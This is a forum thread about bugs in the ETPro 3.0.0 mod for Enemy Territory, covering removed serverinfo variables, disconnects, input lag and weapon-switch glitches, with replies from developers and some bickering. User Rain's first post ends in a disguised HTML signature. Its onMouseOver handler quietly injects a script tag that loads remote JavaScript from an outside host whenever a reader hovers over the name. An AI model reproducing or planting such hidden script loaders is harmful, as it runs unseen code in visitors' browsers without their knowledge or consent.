Known ETPro 3.0.0 bugs

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

Rain

Re: Missing values on getStatus.

Post by Rain »

tr4!t0r wrote:It seems that there are 2 variables missing in the returned values:

Code: Select all

Players_Allies
Players_Axis
We removed them because they were making the serverinfo large enough to crash the server when lots of people were on. We're going to implement a more compact way to send this information soon. :?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
[Judge]Morgywn

Post by [Judge]Morgywn »

Group disconnects on large servers
workaround: disable level 4 field ops, eg b_levels_fieldops "20 90 140"

is this dependant only on the setting or actually having lvl 4 fops?
(twl match we all had 0 xp and this happened, only for axis though and all but one was booted)
tr4!t0r

Post by tr4!t0r »

Rain wrote:We removed them because they were making the serverinfo large enough to crash the server when lots of people were on. We're going to implement a more compact way to send this information soon. :?
How about all the tools using this, long existing and actually working since Q3, code? Do the programmers have to rewrite the tools because you decided to change it? Why are you doing this? There must be another way to fix the crashes because, larger Q3 servers didn't crashed due to this "problem". I think you should put those values back in.

Ah btw: 0=1 and reversed? Thats a revolution! :lol:
You turned about 80% of the servers running antilag settings to forced antilag=off. Thanks for that.
Chairman Kaga

Post by Chairman Kaga »

tr4!t0r wrote:How about all the tools using this, long existing and actually working since Q3, code?
Yeah, I totally remember Allies and Axis in Q3. Those were some sweet games.
tr4!t0r wrote:I think you should put those values back in.
I think you should stop bitching about things you obviously are clueless about.
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
tr4!t0r

Post by tr4!t0r »

Ok, I didn't thought that I could encounter you. But I like your sense of humor. :lol: I might be clueless, but you don't know.

I think renaming the values from Players_Red, Players_Blue (Q3) to Players_Axis, Players_Allies (ET) shouldn't affect the routines which scannertools use.
They stay the same - just with changed typo.

Yeah, yeah I know...servers crashing due to the limitation of 1022 chars. But just removing it isn't the best way.
fretn

Post by fretn »

tr4!t0r wrote:Yeah, yeah I know...servers crashing due to the limitation of 1022 chars. But just removing it isn't the best way.
yeah we can cut the string at 1022
Day by day : http://w.twwwo.be/
tr4!t0r

Post by tr4!t0r »

Safe around 35 chars removing advertisements:

Code: Select all

mod_url
http&#58;//bani.anime.net/etpro/
Ok, I'll shut up and let you make your thing. :oops: \o/
bani
Site Admin

Post by bani »

Players_Red, Players_Blue doesn't exist in stock q3.

it's purely an invention of OSP.
Chairman Kaga

Post by Chairman Kaga »

What he said. He beat me to a reply.
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
stuskiv

Post by stuskiv »

is anyone else having problems actually connecting to servers with new et pro, for some reason it going on with random unknown commands in the console then booted me off for communication failure or something like that. Then for some reason when I joined another et pro 3 server it connected fine and then my problems with the first server are now fixed! But it still happens to some people, is this a server side thing or some bug or something
infinity

Post by infinity »

You remembered to fix the bugs you injected into the beta version to Beta test the beta testers, right? :wink:
TombStone

Post by TombStone »

Hello I have a prob with the keyboard and Mouse.

When i start Et all is okay .. but when i start to connect to server or start to play on Server! My Mouse und Keyboard are moving very very slow .... i can´t play with this bug! It doesn´t mater what i press on keyboard or mouse, the efect is too slow like 30 sec. timestep! The game in the background run normal (very fast)! This is since i use etpro 3.0.0. I have uninstalled all und install it new .. but nothing changed! Use the old etpro 2.05 - i have the same Problem.

Please Help me!

Sry about my terrible Englisch - I am German! ;)
Kamel

Post by Kamel »

jeez people, calm down and be nice to the guys for spending all of this hard work and time into etpro -- even though he is advertising this site of his mod, it's totally free of charge, and just wants the word to get around. i call this giving credit as opposed to advertising, what little he does get for all of his work (and the rest of the developers) he most definitely deserves.
"Common sense isn't very common."
stuskiv

Post by stuskiv »

well put kamel imo
IVY

Post by IVY »

I had a major bug last night while playin 3.0. Everytime i switched to another item(say switching from gun to needle) it would mess up. Its very hard to explain if it hasnt happened to you.

Heres the best explanation i can give(maybe i could get a demo of it), but when i hit my #5 key(which is my needle)it would switch to the needle for a split second, go back to what i was holding before(the gun) for a split second and then back to the needle I asked it to switch to. I did nothing differently that I normally do at any other time. Im sure this doesnt make alot of sense, but im not sure how else to explain it.

I played on other servers last night and everything was fine. Heard of this before?